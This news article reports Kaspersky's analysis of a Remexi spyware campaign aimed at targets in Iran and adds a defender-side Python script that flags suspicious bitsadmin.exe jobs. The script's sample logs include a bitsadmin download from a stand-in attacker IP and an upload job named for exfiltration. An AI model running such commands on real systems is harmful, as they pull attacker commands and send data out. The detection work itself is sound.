
Researchers: Remexi spyware campaign targeted diplomatic institutions based in Iran

A cyberespionage campaign targeted Iranian IP addresses late last year, with the goal of infecting victims with an updated version of Remexi backdoor malware, researchers have reported. Some of these IP addresses belong to foreign diplomatic entities located within Iran's borders.

Remexi is typically associated with a reputed Iranian APT group known as Chafer. Its use in the 2018 campaign suggests that Iranian actors may have executed a domestic espionage operation against entities within Iran's own borders, researchers with Kaspersky Lab are reporting.

Kaspersky originally analyzed the threat back in autumn of 2018, before privately sharing an intelligence report with its customers in November. But today Kaspersky publicly shared its findings in a blog post authored by Denis Legezo, security researcher with the company's Global Research and Analysis Team (GReAT).

Although Remexi originally dates back to at least 2015, the version Kaspersky analyzed had a March 2018 compilation time stamp. According to Kaspersky, Remexi's spyware capabilities include capturing keystrokes, screenshots, credentials, and browser data such as cookies and history, and then communicating this data to the attackers.

Moreover, "the attackers rely heavily on Microsoft technologies on both the client and server sides," Legezo writes. "The Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data," and the C&C architecture "is based on IIS using .asp technology to handle the victims' HTTP requests."
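One defender-side check for the BITS usage described above, added here as an example and not taken from Kaspersky's report: it scans constructed Sysmon-style process-creation lines for bitsadmin.exe jobs that upload data or fetch from hosts outside an assumed corporate allowlist (the host names, paths and allowlist are all made up for the example).

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation records, not real telemetry.
SAMPLE_LOGS = [
    "Image: C:\\Windows\\System32\\bitsadmin.exe|CommandLine: bitsadmin /transfer upd /download /priority normal https://updates.example-corp.internal/patch.cab C:\\Temp\\patch.cab",
    "Image: C:\\Windows\\System32\\bitsadmin.exe|CommandLine: bitsadmin /transfer j1 /download /priority high http://203.0.113.7/cmd.txt C:\\Users\\Public\\cmd.txt",
    "Image: C:\\Windows\\System32\\bitsadmin.exe|CommandLine: bitsadmin /create /upload exf",
    "Image: C:\\Windows\\System32\\notepad.exe|CommandLine: notepad.exe C:\\Users\\u\\notes.txt",
]

# Assumed allowlist of hosts that legitimately serve BITS downloads in this environment.
ALLOWED_HOSTS = {"updates.example-corp.internal"}

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)


def parse_line(line):
    """Split a 'Key: value|Key: value' record into its Image and CommandLine fields."""
    fields = dict(part.split(": ", 1) for part in line.split("|"))
    return fields.get("Image", ""), fields.get("CommandLine", "")


def classify(cmdline):
    """Return the reasons a bitsadmin command line looks like C2 or exfiltration."""
    reasons = []
    # Upload jobs push local data to a remote server; almost never needed by end users.
    if "/upload" in cmdline.lower():
        reasons.append("upload job (possible exfiltration over BITS)")
    # Any transfer whose remote host is not on the allowlist is worth a look.
    for host in URL_RE.findall(cmdline):
        if host.lower() not in ALLOWED_HOSTS:
            reasons.append(f"transfer to non-allowlisted host {host}")
    return reasons


def detect(lines):
    """Return (command line, reasons) for every suspicious bitsadmin.exe execution."""
    findings = []
    for line in lines:
        image, cmdline = parse_line(line)
        if not image.lower().endswith("\\bitsadmin.exe"):
            continue
        reasons = classify(cmdline)
        if reasons:
            findings.append((cmdline, reasons))
    return findings


if __name__ == "__main__":
    for cmdline, reasons in detect(SAMPLE_LOGS):
        print(cmdline, "->", "; ".join(reasons))
```

The check depends on command-line logging being enabled (Sysmon Event ID 1 or Windows 4688 with command-line auditing); without it, only the bitsadmin.exe image name is visible.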

Kaspersky found no conclusive evidence pointing to how Remexi was spread. However, in one instance of infection, researchers were able to establish a connection between Remexi and an AutoIT script compiled as a PE file. Kaspersky believes this executable may have been a dropper that used FTP with hard-coded credentials to receive the Remexi payload.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts, and video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
